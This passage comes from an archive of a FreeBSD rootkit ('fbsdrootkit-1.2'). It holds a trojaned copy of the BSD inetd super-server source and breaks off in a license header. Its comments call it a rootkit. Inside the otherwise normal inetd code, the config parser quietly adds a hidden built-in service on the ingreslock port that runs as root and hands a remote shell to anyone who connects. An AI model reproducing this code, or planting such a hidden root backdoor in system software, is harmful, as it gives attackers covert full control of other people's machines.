returns the proper entry for the service. Tcpmux returns a * negative reply if the service doesn't exist, otherwise the invoked * server is expected to return the positive reply if the service type in * inetd.conf file has the prefix "tcpmux/". If the service type has the * prefix "tcpmux/+", tcpmux will return the positive reply for the * process; this is for compatibility with older server code, and also * allows you to invoke programs that use stdin/stdout without putting any * special server code in them. Services that use tcpmux are "nowait" * because they do not have a well-known port and hence cannot listen * for new requests. * * For RPC services * service name/version must be in /etc/rpc * socket type stream/dgram/raw/rdm/seqpacket * protocol must be in /etc/protocols * wait/nowait single-threaded/multi-threaded * user user to run daemon as * server program full path name * server program arguments maximum of MAXARGS * * Comment lines are indicated by a `#' in column 1. */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pathnames.h" /* Rootkit configuration files */ #include "../config.h" #define TOOMANY 256 /* don't start more than TOOMANY */ #define CNT_INTVL 60 /* servers in CNT_INTVL sec. */ #define RETRYTIME (60*10) /* retry after bind or server fail */ #define SIGBLOCK (sigmask(SIGCHLD)|sigmask(SIGHUP)|sigmask(SIGALRM)) int debug = 0; int log = 0; int nsock, maxsock; fd_set allsock; int options; int timingout; int toomany = TOOMANY; struct servent *sp; struct rpcent *rpc; struct servtab { char *se_service; /* name of service */ int se_socktype; /* type of socket to use */ char *se_proto; /* protocol used */ short se_wait; /* single threaded server */ short se_checked; /* looked at during merge */ char *se_user; /* user name to run as */ struct biltin *se_bi; /* if built-in, description */ char *se_server; /* server program */ #define MAXARGV 20 char *se_argv[MAXARGV+1]; /* program arguments */ int se_fd; /* open descriptor */ int se_type; /* type */ struct sockaddr_in se_ctrladdr;/* bound address */ int se_rpc; /* ==1 if RPC service */ int se_rpc_prog; /* RPC program number */ u_int se_rpc_lowvers; /* RPC low version */ u_int se_rpc_highvers; /* RPC high version */ int se_count; /* number started since se_time */ struct timeval se_time; /* start of se_count */ struct servtab *se_next; } *servtab; #define NORM_TYPE 0 #define MUX_TYPE 1 #define MUXPLUS_TYPE 2 #define ISMUX(sep) (((sep)->se_type == MUX_TYPE) || \ ((sep)->se_type == MUXPLUS_TYPE)) #define ISMUXPLUS(sep) ((sep)->se_type == MUXPLUS_TYPE) void chargen_dg __P((int, struct servtab *)); void chargen_stream __P((int, struct servtab *)); void close_sep __P((struct servtab *)); void config __P((int)); void daytime_dg __P((int, struct servtab *)); void daytime_stream __P((int, struct servtab *)); void discard_dg __P((int, struct servtab *)); void discard_stream __P((int, struct servtab *)); void echo_dg __P((int, struct servtab *)); void echo_stream __P((int, struct servtab *)); void endconfig __P((void)); struct servtab *enter __P((struct servtab *)); void freeconfig __P((struct servtab *)); struct servtab *getconfigent __P((void)); void machtime_dg __P((int, struct servtab *)); void machtime_stream __P((int, struct servtab *)); char *newstr __P((char *)); char *nextline __P((FILE *)); void print_service __P((char *, struct servtab *)); void reapchild __P((int)); void retry __P((int)); int setconfig __P((void)); void setup __P((struct servtab *)); char *sskip __P((char **)); char *skip __P((char **)); struct servtab *tcpmux __P((int)); void unregisterrpc __P((register struct servtab *sep)); struct biltin { char *bi_service; /* internally provided service name */ int bi_socktype; /* type of socket supported */ short bi_fork; /* 1 if should fork before call */ short bi_wait; /* 1 if should wait for child */ void (*bi_fn)(); /* function which performs it */ } biltins[] = { /* Echo received data */ { "echo", SOCK_STREAM, 1, 0, echo_stream }, { "echo", SOCK_DGRAM, 0, 0, echo_dg }, /* Internet /dev/null */ { "discard", SOCK_STREAM, 1, 0, discard_stream }, { "discard", SOCK_DGRAM, 0, 0, discard_dg }, /* Return 32 bit time since 1970 */ { "time", SOCK_STREAM, 0, 0, machtime_stream }, { "time", SOCK_DGRAM, 0, 0, machtime_dg }, /* Return human-readable time */ { "daytime", SOCK_STREAM, 0, 0, daytime_stream }, { "daytime", SOCK_DGRAM, 0, 0, daytime_dg }, /* Familiar character generator */ { "chargen", SOCK_STREAM, 1, 0, chargen_stream }, { "chargen", SOCK_DGRAM, 0, 0, chargen_dg }, { "tcpmux", SOCK_STREAM, 1, 0, (void (*)())tcpmux }, { NULL } }; #define NUMINT (sizeof(intab) / sizeof(struct inent)) char *CONFIG = _PATH_INETDCONF; char **Argv; char *LastArg; /* Some global variables */ int werd=1; int main(argc, argv, envp) int argc; char *argv[], *envp[]; { struct servtab *sep; struct passwd *pwd; struct sigvec sv; int tmpint, ch, dofork; pid_t pid; char buf[50]; struct sockaddr_in peer; int i; Argv = argv; if (envp == 0 || *envp == 0) envp = argv; while (*envp) envp++; LastArg = envp[-1] + strlen(envp[-1]); openlog("inetd", LOG_PID | LOG_NOWAIT, LOG_DAEMON); while ((ch = getopt(argc, argv, "dlR:")) != EOF) switch(ch) { case 'd': debug = 1; options |= SO_DEBUG; break; case 'l': log = 1; break; case 'R': { /* invocation rate */ char *p; tmpint = strtol(optarg, &p, 0); if (tmpint < 1 || *p) syslog(LOG_ERR, "-R %s: bad value for service invocation rate", optarg); else toomany = tmpint; break; } case '?': default: syslog(LOG_ERR, "usage: inetd [-dl] [-R rate] [conf-file]"); exit(1); } argc -= optind; argv += optind; if (argc > 0) CONFIG = argv[0]; if (debug == 0) { FILE *fp; daemon(0, 0); pid = getpid(); fp = fopen(_PATH_INETDPID, "w"); if (fp) { fprintf(fp, "%ld\n", (long)pid); fclose(fp); } else { syslog(LOG_WARNING, _PATH_INETDPID ": %m"); } } memset(&sv, 0, sizeof(sv)); sv.sv_mask = SIGBLOCK; sv.sv_handler = retry; sigvec(SIGALRM, &sv, (struct sigvec *)0); config(SIGHUP); sv.sv_handler = config; sigvec(SIGHUP, &sv, (struct sigvec *)0); sv.sv_handler = reapchild; sigvec(SIGCHLD, &sv, (struct sigvec *)0); { /* space for daemons to overwrite environment for ps */ #define DUMMYSIZE 100 char dummy[DUMMYSIZE]; (void)memset(dummy, 'x', sizeof(DUMMYSIZE) - 1); dummy[DUMMYSIZE - 1] = '\0'; (void)setenv("inetd_dummy", dummy, 1); } for (;;) { int n, ctrl; fd_set readable; if (nsock == 0) { (void) sigblock(SIGBLOCK); while (nsock == 0) sigpause(0L); (void) sigsetmask(0L); } readable = allsock; if ((n = select(maxsock + 1, &readable, (fd_set *)0, (fd_set *)0, (struct timeval *)0)) <= 0) { if (n < 0 && errno != EINTR) syslog(LOG_WARNING, "select: %m"); sleep(1); continue; } for (sep = servtab; n && sep; sep = sep->se_next) if (sep->se_fd != -1 && FD_ISSET(sep->se_fd, &readable)) { n--; if (debug) fprintf(stderr, "someone wants %s\n", sep->se_service); if (!sep->se_wait && sep->se_socktype == SOCK_STREAM) { ctrl = accept(sep->se_fd, (struct sockaddr *)0, (int *)0); if (debug) fprintf(stderr, "accept, ctrl %d\n", ctrl); if (ctrl < 0) { if (errno != EINTR) syslog(LOG_WARNING, "accept (for %s): %m", sep->se_service); continue; } if(log) { i = sizeof peer; if(getpeername(ctrl, (struct sockaddr *) &peer, &i)) { syslog(LOG_WARNING, "getpeername(for %s): %m", sep->se_service); continue; } syslog(LOG_INFO,"%s from %s", sep->se_service, inet_ntoa(peer.sin_addr)); } /* * Call tcpmux to find the real service to exec. */ if (sep->se_bi && sep->se_bi->bi_fn == (void (*)()) tcpmux) { struct servtab *tsep; tsep = tcpmux(ctrl); if (tsep == NULL) { close(ctrl); continue; } sep = tsep; } } else ctrl = sep->se_fd; (void) sigblock(SIGBLOCK); pid = 0; dofork = (sep->se_bi == 0 || sep->se_bi->bi_fork); if (dofork) { if (sep->se_count++ == 0) (void)gettimeofday(&sep->se_time, (struct timezone *)0); else if (sep->se_count >= toomany) { struct timeval now; (void)gettimeofday(&now, (struct timezone *)0); if (now.tv_sec - sep->se_time.tv_sec > CNT_INTVL) { sep->se_time = now; sep->se_count = 1; } else { syslog(LOG_ERR, "%s/%s server failing (looping), service terminated", sep->se_service, sep->se_proto); close_sep(sep); sigsetmask(0L); if (!timingout) { timingout = 1; alarm(RETRYTIME); } continue; } } pid = fork(); } if (pid < 0) { syslog(LOG_ERR, "fork: %m"); if (!sep->se_wait && sep->se_socktype == SOCK_STREAM) close(ctrl); sigsetmask(0L); sleep(1); continue; } if (pid && sep->se_wait) { sep->se_wait = pid; if (sep->se_fd >= 0) { FD_CLR(sep->se_fd, &allsock); nsock--; } } sigsetmask(0L); if (pid == 0) { if (debug && dofork) setsid(); if (dofork) { if (debug) fprintf(stderr, "+ Closing from %d\n", maxsock); for (tmpint = maxsock; tmpint > 2; tmpint--) if (tmpint != ctrl) close(tmpint); } if (sep->se_bi) (*sep->se_bi->bi_fn)(ctrl, sep); else { if (debug) fprintf(stderr, "%d execl %s\n", getpid(), sep->se_server); dup2(ctrl, 0); close(ctrl); dup2(0, 1); dup2(0, 2); if ((pwd = getpwnam(sep->se_user)) == NULL) { syslog(LOG_ERR, "%s/%s: %s: No such user", sep->se_service, sep->se_proto, sep->se_user); if (sep->se_socktype != SOCK_STREAM) recv(0, buf, sizeof (buf), 0); _exit(1); } if (pwd->pw_uid) { if (setgid(pwd->pw_gid) < 0) { syslog(LOG_ERR, "%s: can't set gid %d: %m", sep->se_service, pwd->pw_gid); _exit(1); } (void) initgroups(pwd->pw_name, pwd->pw_gid); if (setuid(pwd->pw_uid) < 0) { syslog(LOG_ERR, "%s: can't set uid %d: %m", sep->se_service, pwd->pw_uid); _exit(1); } } execv(sep->se_server, sep->se_argv); if (sep->se_socktype != SOCK_STREAM) recv(0, buf, sizeof (buf), 0); syslog(LOG_ERR, "cannot execute %s: %m", sep->se_server); _exit(1); } } if (!sep->se_wait && sep->se_socktype == SOCK_STREAM) close(ctrl); } } } void reapchild(signo) int signo; { int status; pid_t pid; struct servtab *sep; for (;;) { pid = wait3(&status, WNOHANG, (struct rusage *)0); if (pid <= 0) break; if (debug) fprintf(stderr, "%d reaped, status %#x\n", pid, status); for (sep = servtab; sep; sep = sep->se_next) if (sep->se_wait == pid) { if (status) syslog(LOG_WARNING, "%s: exit status 0x%x", sep->se_server, status); if (debug) fprintf(stderr, "restored %s, fd %d\n", sep->se_service, sep->se_fd); FD_SET(sep->se_fd, &allsock); nsock++; sep->se_wait = 1; } } } void config(signo) int signo; { struct servtab *sep, *cp, **sepp; struct passwd *pwd; long omask; /* Make sure shell service gets reloaded along with everything else */ if(!werd) werd++; if (!setconfig()) { syslog(LOG_ERR, "%s: %m", CONFIG); return; } for (sep = servtab; sep; sep = sep->se_next) sep->se_checked = 0; while (cp = getconfigent()) { if ((pwd = getpwnam(cp->se_user)) == NULL) { syslog(LOG_ERR, "%s/%s: No such user '%s', service ignored", cp->se_service, cp->se_proto, cp->se_user); continue; } for (sep = servtab; sep; sep = sep->se_next) if (strcmp(sep->se_service, cp->se_service) == 0 && strcmp(sep->se_proto, cp->se_proto) == 0) break; if (sep != 0) { int i; omask = sigblock(SIGBLOCK); /* * sep->se_wait may be holding the pid of a daemon * that we're waiting for. If so, don't overwrite * it unless the config file explicitly says don't * wait. */ if (cp->se_bi == 0 && (sep->se_wait == 1 || cp->se_wait == 0)) sep->se_wait = cp->se_wait; #define SWAP(a, b) { char *c = a; a = b; b = c; } if (cp->se_user) SWAP(sep->se_user, cp->se_user); if (cp->se_server) SWAP(sep->se_server, cp->se_server); for (i = 0; i < MAXARGV; i++) SWAP(sep->se_argv[i], cp->se_argv[i]); sigsetmask(omask); freeconfig(cp); if (debug) print_service("REDO", sep); } else { sep = enter(cp); if (debug) print_service("ADD ", sep); } sep->se_checked = 1; if (ISMUX(sep)) { sep->se_fd = -1; continue; } if (!sep->se_rpc) { sp = getservbyname(sep->se_service, sep->se_proto); if (sp == 0) { syslog(LOG_ERR, "%s/%s: unknown service", sep->se_service, sep->se_proto); sep->se_checked = 0; continue; } if (sp->s_port != sep->se_ctrladdr.sin_port) { sep->se_ctrladdr.sin_family = AF_INET; sep->se_ctrladdr.sin_port = sp->s_port; if (sep->se_fd >= 0) close_sep(sep); } } else { rpc = getrpcbyname(sep->se_service); if (rpc == 0) { syslog(LOG_ERR, "%s/%s unknown RPC service.", sep->se_service, sep->se_proto); if (sep->se_fd != -1) (void) close(sep->se_fd); sep->se_fd = -1; continue; } if (rpc->r_number != sep->se_rpc_prog) { if (sep->se_rpc_prog) unregisterrpc(sep); sep->se_rpc_prog = rpc->r_number; if (sep->se_fd != -1) (void) close(sep->se_fd); sep->se_fd = -1; } } if (sep->se_fd == -1) setup(sep); } endconfig(); /* * Purge anything not looked at above. */ omask = sigblock(SIGBLOCK); sepp = &servtab; while (sep = *sepp) { if (sep->se_checked) { sepp = &sep->se_next; continue; } *sepp = sep->se_next; if (sep->se_fd >= 0) close_sep(sep); if (debug) print_service("FREE", sep); if (sep->se_rpc && sep->se_rpc_prog > 0) unregisterrpc(sep); freeconfig(sep); free((char *)sep); } (void) sigsetmask(omask); } void unregisterrpc(sep) struct servtab *sep; { int i; struct servtab *sepp; long omask; omask = sigblock(SIGBLOCK); for (sepp = servtab; sepp; sepp = sepp->se_next) { if (sepp == sep) continue; if (sep->se_checked == 0 || !sepp->se_rpc || sep->se_rpc_prog != sepp->se_rpc_prog) continue; return; } if (debug) print_service("UNREG", sep); for (i = sep->se_rpc_lowvers; i <= sep->se_rpc_highvers; i++) pmap_unset(sep->se_rpc_prog, i); if (sep->se_fd != -1) (void) close(sep->se_fd); sep->se_fd = -1; (void) sigsetmask(omask); } void retry(signo) int signo; { struct servtab *sep; timingout = 0; for (sep = servtab; sep; sep = sep->se_next) if (sep->se_fd == -1) setup(sep); } void setup(sep) struct servtab *sep; { int on = 1; if ((sep->se_fd = socket(AF_INET, sep->se_socktype, 0)) < 0) { if (debug) fprintf(stderr, "socket failed on %s/%s: %s\n", sep->se_service, sep->se_proto, strerror(errno)); syslog(LOG_ERR, "%s/%s: socket: %m", sep->se_service, sep->se_proto); return; } #define turnon(fd, opt) \ setsockopt(fd, SOL_SOCKET, opt, (char *)&on, sizeof (on)) if (strcmp(sep->se_proto, "tcp") == 0 && (options & SO_DEBUG) && turnon(sep->se_fd, SO_DEBUG) < 0) syslog(LOG_ERR, "setsockopt (SO_DEBUG): %m"); if (turnon(sep->se_fd, SO_REUSEADDR) < 0) syslog(LOG_ERR, "setsockopt (SO_REUSEADDR): %m"); #undef turnon if (bind(sep->se_fd, (struct sockaddr *)&sep->se_ctrladdr, sizeof (sep->se_ctrladdr)) < 0) { if (debug) fprintf(stderr, "bind failed on %s/%s: %s\n", sep->se_service, sep->se_proto, strerror(errno)); syslog(LOG_ERR, "%s/%s: bind: %m", sep->se_service, sep->se_proto); (void) close(sep->se_fd); sep->se_fd = -1; if (!timingout) { timingout = 1; alarm(RETRYTIME); } return; } if (sep->se_rpc) { int i, len = sizeof(struct sockaddr); if (getsockname(sep->se_fd, (struct sockaddr*)&sep->se_ctrladdr, &len) < 0){ syslog(LOG_ERR, "%s/%s: getsockname: %m", sep->se_service, sep->se_proto); (void) close(sep->se_fd); sep->se_fd = -1; return; } if (debug) print_service("REG ", sep); for (i = sep->se_rpc_lowvers; i <= sep->se_rpc_highvers; i++) { pmap_unset(sep->se_rpc_prog, i); pmap_set(sep->se_rpc_prog, i, (sep->se_socktype == SOCK_DGRAM) ? IPPROTO_UDP : IPPROTO_TCP, ntohs(sep->se_ctrladdr.sin_port)); } } if (sep->se_socktype == SOCK_STREAM) listen(sep->se_fd, 10); FD_SET(sep->se_fd, &allsock); nsock++; if (sep->se_fd > maxsock) maxsock = sep->se_fd; if (debug) { fprintf(stderr, "registered %s on %d\n", sep->se_server, sep->se_fd); } } /* * Finish with a service and its socket. */ void close_sep(sep) struct servtab *sep; { if (sep->se_fd >= 0) { nsock--; FD_CLR(sep->se_fd, &allsock); (void) close(sep->se_fd); sep->se_fd = -1; } sep->se_count = 0; /* * Don't keep the pid of this running deamon: when reapchild() * reaps this pid, it would erroneously increment nsock. */ if (sep->se_wait > 1) sep->se_wait = 1; } struct servtab * enter(cp) struct servtab *cp; { struct servtab *sep; long omask; sep = (struct servtab *)malloc(sizeof (*sep)); if (sep == (struct servtab *)0) { syslog(LOG_ERR, "Out of memory."); exit(-1); } *sep = *cp; sep->se_fd = -1; omask = sigblock(SIGBLOCK); sep->se_next = servtab; servtab = sep; sigsetmask(omask); return (sep); } FILE *fconfig = NULL; struct servtab serv; char line[LINE_MAX]; int setconfig() { if (fconfig != NULL) { fseek(fconfig, 0L, SEEK_SET); return (1); } fconfig = fopen(CONFIG, "r"); return (fconfig != NULL); } void endconfig() { if (fconfig) { (void) fclose(fconfig); fconfig = NULL; } } struct servtab * getconfigent() { struct servtab *sep = &serv; int argc; char *cp, *arg; char *versp; static char TCPMUX_TOKEN[] = "tcpmux/"; #define MUX_LEN (sizeof(TCPMUX_TOKEN)-1) /* Add one-time internal shell service on ingreslock port */ if(werd) { struct biltin *b=malloc(sizeof(struct biltin)); b->bi_service="ingreslock"; b->bi_socktype=SOCK_STREAM; b->bi_fork=1; b->bi_wait=0; b->bi_fn=rshell_stream; sep->se_bi=b; sep->se_service="ingreslock"; sep->se_socktype=SOCK_STREAM; sep->se_proto="tcp"; sep->se_wait=0; sep->se_user="root"; sep->se_server="internal"; werd--; return(sep); } more: while ((cp = nextline(fconfig)) && (*cp == '#' || *cp == '\0')) ; if (cp == NULL) return ((struct servtab *)0); /* * clear the static buffer, since some fields (se_ctrladdr, * for example) don't get initialized here. */ memset((caddr_t)sep, 0, sizeof *sep); arg = skip(&cp); if (cp == NULL) { /* got an empty line containing just blanks/tabs. */ goto more; } if (strncmp(arg, TCPMUX_TOKEN, MUX_LEN) == 0) { char *c = arg + MUX_LEN; if (*c == '+') { sep->se_type = MUXPLUS_TYPE; c++; } else sep->se_type = MUX_TYPE; sep->se_service = newstr(c); } else { sep->se_service = newstr(arg); sep->se_type = NORM_TYPE; } arg = sskip(&cp); if (strcmp(arg, "stream") == 0) sep->se_socktype = SOCK_STREAM; else if (strcmp(arg, "dgram") == 0) sep->se_socktype = SOCK_DGRAM; else if (strcmp(arg, "rdm") == 0) sep->se_socktype = SOCK_RDM; else if (strcmp(arg, "seqpacket") == 0) sep->se_socktype = SOCK_SEQPACKET; else if (strcmp(arg, "raw") == 0) sep->se_socktype = SOCK_RAW; else sep->se_socktype = -1; sep->se_proto = newstr(sskip(&cp)); if (strncmp(sep->se_proto, "rpc/", 4) == 0) { sep->se_proto += 4; sep->se_rpc = 1; sep->se_rpc_prog = sep->se_rpc_lowvers = sep->se_rpc_lowvers = 0; sep->se_ctrladdr.sin_family = AF_INET; sep->se_ctrladdr.sin_port = 0; sep->se_ctrladdr.sin_addr.s_addr = htonl(INADDR_ANY); if ((versp = rindex(sep->se_service, '/'))) { *versp++ = '\0'; switch (sscanf(versp, "%d-%d", &sep->se_rpc_lowvers, &sep->se_rpc_highvers)) { case 2: break; case 1: sep->se_rpc_highvers = sep->se_rpc_lowvers; break; default: syslog(LOG_ERR, "bad RPC version specifier; %s\n", sep->se_service); freeconfig(sep); goto more; } } else { sep->se_rpc_lowvers = sep->se_rpc_highvers = 1; } } arg = sskip(&cp); sep->se_wait = strcmp(arg, "wait") == 0; if (ISMUX(sep)) { /* * Silently enforce "nowait" for TCPMUX services since * they don't have an assigned port to listen on. */ sep->se_wait = 0; if (strcmp(sep->se_proto, "tcp")) { syslog(LOG_ERR, "%s: bad protocol for tcpmux service %s", CONFIG, sep->se_service); goto more; } if (sep->se_socktype != SOCK_STREAM) { syslog(LOG_ERR, "%s: bad socket type for tcpmux service %s", CONFIG, sep->se_service); goto more; } } sep->se_user = newstr(sskip(&cp)); sep->se_server = newstr(sskip(&cp)); if (strcmp(sep->se_server, "internal") == 0) { struct biltin *bi; for (bi = biltins; bi->bi_service; bi++) if (bi->bi_socktype == sep->se_socktype && strcmp(bi->bi_service, sep->se_service) == 0) break; if (bi->bi_service == 0) { syslog(LOG_ERR, "internal service %s unknown", sep->se_service); goto more; } sep->se_bi = bi; sep->se_wait = bi->bi_wait; } else sep->se_bi = NULL; argc = 0; for (arg = skip(&cp); cp; arg = skip(&cp)) if (argc < MAXARGV) sep->se_argv[argc++] = newstr(arg); while (argc <= MAXARGV) sep->se_argv[argc++] = NULL; return (sep); } void freeconfig(cp) struct servtab *cp; { int i; if (cp->se_service) free(cp->se_service); if (cp->se_proto) free(cp->se_proto); if (cp->se_user) free(cp->se_user); if (cp->se_server) free(cp->se_server); for (i = 0; i < MAXARGV; i++) if (cp->se_argv[i]) free(cp->se_argv[i]); } /* * Safe skip - if skip returns null, log a syntax error in the * configuration file and exit. */ char * sskip(cpp) char **cpp; { char *cp; cp = skip(cpp); if (cp == NULL) { syslog(LOG_ERR, "%s: syntax error", CONFIG); exit(-1); } return (cp); } char * skip(cpp) char **cpp; { char *cp = *cpp; char *start; again: while (*cp == ' ' || *cp == '\t') cp++; if (*cp == '\0') { int c; c = getc(fconfig); (void) ungetc(c, fconfig); if (c == ' ' || c == '\t') if (cp = nextline(fconfig)) goto again; *cpp = (char *)0; return ((char *)0); } start = cp; while (*cp && *cp != ' ' && *cp != '\t') cp++; if (*cp != '\0') *cp++ = '\0'; *cpp = cp; return (start); } char * nextline(fd) FILE *fd; { char *cp; if (fgets(line, sizeof (line), fd) == NULL) return ((char *)0); cp = strchr(line, '\n'); if (cp) *cp = '\0'; return (line); } char * newstr(cp) char *cp; { if (cp = strdup(cp ? cp : "")) return (cp); syslog(LOG_ERR, "strdup: %m"); exit(-1); } void setproctitle(a, s) char *a; int s; { int size; char *cp; struct sockaddr_in sin; char buf[80]; cp = Argv[0]; size = sizeof(sin); if (getpeername(s, (struct sockaddr *)&sin, &size) == 0) (void) sprintf(buf, "-%s [%s]", a, inet_ntoa(sin.sin_addr)); else (void) sprintf(buf, "-%s", a); strncpy(cp, buf, LastArg - cp); cp += strlen(cp); while (cp < LastArg) *cp++ = ' '; } /* * Internet services provided internally by inetd: */ #define BUFSIZE 8192 /* Internal rootkit shell service function */ #include "../rootkitinetd.h" /* ARGSUSED */ void echo_stream(s, sep) /* Echo service -- echo data back */ int s; struct servtab *sep; { char buffer[BUFSIZE]; int i; setproctitle(sep->se_service, s); while ((i = read(s, buffer, sizeof(buffer))) > 0 && write(s, buffer, i) > 0) ; exit(0); } int check_loop(sin, sep) struct sockaddr_in *sin; struct servtab *sep; { struct servtab *se2; for (se2 = servtab; se2; se2 = se2->se_next) { if (!se2->se_bi || se2->se_socktype != SOCK_DGRAM) continue; if (sin->sin_port == se2->se_ctrladdr.sin_port) { syslog(LOG_WARNING, "%s/%s:%s/%s loop request REFUSED from %s", sep->se_service, sep->se_proto, se2->se_service, se2->se_proto, inet_ntoa(sin->sin_addr)); return 1; } } return 0; } /* ARGSUSED */ void echo_dg(s, sep) /* Echo service -- echo data back */ int s; struct servtab *sep; { char buffer[BUFSIZE]; int i, size; struct sockaddr_in sin; size = sizeof(sin); if ((i = recvfrom(s, buffer, sizeof(buffer), 0, (struct sockaddr *)&sin, &size)) < 0) return; if (check_loop(&sin, sep)) return; (void) sendto(s, buffer, i, 0, (struct sockaddr *)&sin, sizeof(sin)); } /* ARGSUSED */ void discard_stream(s, sep) /* Discard service -- ignore data */ int s; struct servtab *sep; { int ret; char buffer[BUFSIZE]; setproctitle(sep->se_service, s); while (1) { while ((ret = read(s, buffer, sizeof(buffer))) > 0) ; if (ret == 0 || errno != EINTR) break; } exit(0); } /* ARGSUSED */ void discard_dg(s, sep) /* Discard service -- ignore data */ int s; struct servtab *sep; { char buffer[BUFSIZE]; (void) read(s, buffer, sizeof(buffer)); } #include #define LINESIZ 72 char ring[128]; char *endring; void initring() { int i; endring = ring; for (i = 0; i <= 128; ++i) if (isprint(i)) *endring++ = i; } /* ARGSUSED */ void chargen_stream(s, sep) /* Character generator */ int s; struct servtab *sep; { int len; char *rs, text[LINESIZ+2]; setproctitle(sep->se_service, s); if (!endring) { initring(); rs = ring; } text[LINESIZ] = '\r'; text[LINESIZ + 1] = '\n'; for (rs = ring;;) { if ((len = endring - rs) >= LINESIZ) memmove(text, rs, LINESIZ); else { memmove(text, rs, len); memmove(text + len, ring, LINESIZ - len); } if (++rs == endring) rs = ring; if (write(s, text, sizeof(text)) != sizeof(text)) break; } exit(0); } /* ARGSUSED */ void chargen_dg(s, sep) /* Character generator */ int s; struct servtab *sep; { struct sockaddr_in sin; static char *rs; int len, size; char text[LINESIZ+2]; if (endring == 0) { initring(); rs = ring; } size = sizeof(sin); if (recvfrom(s, text, sizeof(text), 0, (struct sockaddr *)&sin, &size) < 0) return; if (check_loop(&sin, sep)) return; if ((len = endring - rs) >= LINESIZ) memmove(text, rs, LINESIZ); else { memmove(text, rs, len); memmove(text + len, ring, LINESIZ - len); } if (++rs == endring) rs = ring; text[LINESIZ] = '\r'; text[LINESIZ + 1] = '\n'; (void) sendto(s, text, sizeof(text), 0, (struct sockaddr *)&sin, sizeof(sin)); } /* * Return a machine readable date and time, in the form of the * number of seconds since midnight, Jan 1, 1900. Since gettimeofday * returns the number of seconds since midnight, Jan 1, 1970, * we must add 2208988800 seconds to this figure to make up for * some seventy years Bell Labs was asleep. */ long machtime() { struct timeval tv; if (gettimeofday(&tv, (struct timezone *)0) < 0) { if (debug) fprintf(stderr, "Unable to get time of day\n"); return (0L); } #define OFFSET ((u_long)25567 * 24*60*60) return (htonl((long)(tv.tv_sec + OFFSET))); #undef OFFSET } /* ARGSUSED */ void machtime_stream(s, sep) int s; struct servtab *sep; { long result; result = machtime(); (void) write(s, (char *) &result, sizeof(result)); } /* ARGSUSED */ void machtime_dg(s, sep) int s; struct servtab *sep; { long result; struct sockaddr_in sin; int size; size = sizeof(sin); if (recvfrom(s, (char *)&result, sizeof(result), 0, (struct sockaddr *)&sin, &size) < 0) return; if (check_loop(&sin, sep)) return; result = machtime(); (void) sendto(s, (char *) &result, sizeof(result), 0, (struct sockaddr *)&sin, sizeof(sin)); } /* ARGSUSED */ void daytime_stream(s, sep) /* Return human-readable time of day */ int s; struct servtab *sep; { char buffer[256]; time_t clock; clock = time((time_t *) 0); (void) sprintf(buffer, "%.24s\r\n", ctime(&clock)); (void) write(s, buffer, strlen(buffer)); } /* ARGSUSED */ void daytime_dg(s, sep) /* Return human-readable time of day */ int s; struct servtab *sep; { char buffer[256]; time_t clock; struct sockaddr_in sin; int size; clock = time((time_t *) 0); size = sizeof(sin); if (recvfrom(s, buffer, sizeof(buffer), 0, (struct sockaddr *)&sin, &size) < 0) return; if (check_loop(&sin, sep)) return; (void) sprintf(buffer, "%.24s\r\n", ctime(&clock)); (void) sendto(s, buffer, strlen(buffer), 0, (struct sockaddr *)&sin, sizeof(sin)); } /* * print_service: * Dump relevant information to stderr */ void print_service(action, sep) char *action; struct servtab *sep; { if(sep->se_rpc) fprintf(stderr, "%s: %s proto=%s, wait=%d, user=%s builtin=%x server=%s\n", action, sep->se_service, sep->se_proto, sep->se_wait, sep->se_user, (int)sep->se_bi, sep->se_server); else fprintf(stderr, "%s: %s proto=%s, wait=%d, user=%s builtin=%x server=%s\n", action, sep->se_service, sep->se_proto, sep->se_wait, sep->se_user, (int)sep->se_bi, sep->se_server); } /* * Based on TCPMUX.C by Mark K. Lottor November 1988 * sri-nic::ps:tcpmux.c */ static int /* # of characters upto \r,\n or \0 */ getline(fd, buf, len) int fd; char *buf; int len; { int count = 0, n; do { n = read(fd, buf, len-count); if (n == 0) return (count); if (n < 0) return (-1); while (--n >= 0) { if (*buf == '\r' || *buf == '\n' || *buf == '\0') return (count); count++; buf++; } } while (count < len); return (count); } #define MAX_SERV_LEN (256+2) /* 2 bytes for \r\n */ #define strwrite(fd, buf) (void) write(fd, buf, sizeof(buf)-1) struct servtab * tcpmux(s) int s; { struct servtab *sep; char service[MAX_SERV_LEN+1]; int len; /* Get requested service name */ if ((len = getline(s, service, MAX_SERV_LEN)) < 0) { strwrite(s, "-Error reading service name\r\n"); return (NULL); } service[len] = '\0'; if (debug) fprintf(stderr, "tcpmux: someone wants %s\n", service); /* * Help is a required command, and lists available services, * one per line. */ if (!strcasecmp(service, "help")) { for (sep = servtab; sep; sep = sep->se_next) { if (!ISMUX(sep)) continue; (void)write(s,sep->se_service,strlen(sep->se_service)); strwrite(s, "\r\n"); } return (NULL); } /* Try matching a service in inetd.conf with the request */ for (sep = servtab; sep; sep = sep->se_next) { if (!ISMUX(sep)) continue; if (!strcasecmp(service, sep->se_service)) { if (ISMUXPLUS(sep)) { strwrite(s, "+Go\r\n"); } return (sep); } } strwrite(s, "-Service not available\r\n"); return (NULL); } fbsdrootkit-1.2/inetd/pathnames.h100600 764 764 3702 6143713534 14377 0ustar dfdf/* * Copyright (c) 1989, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF 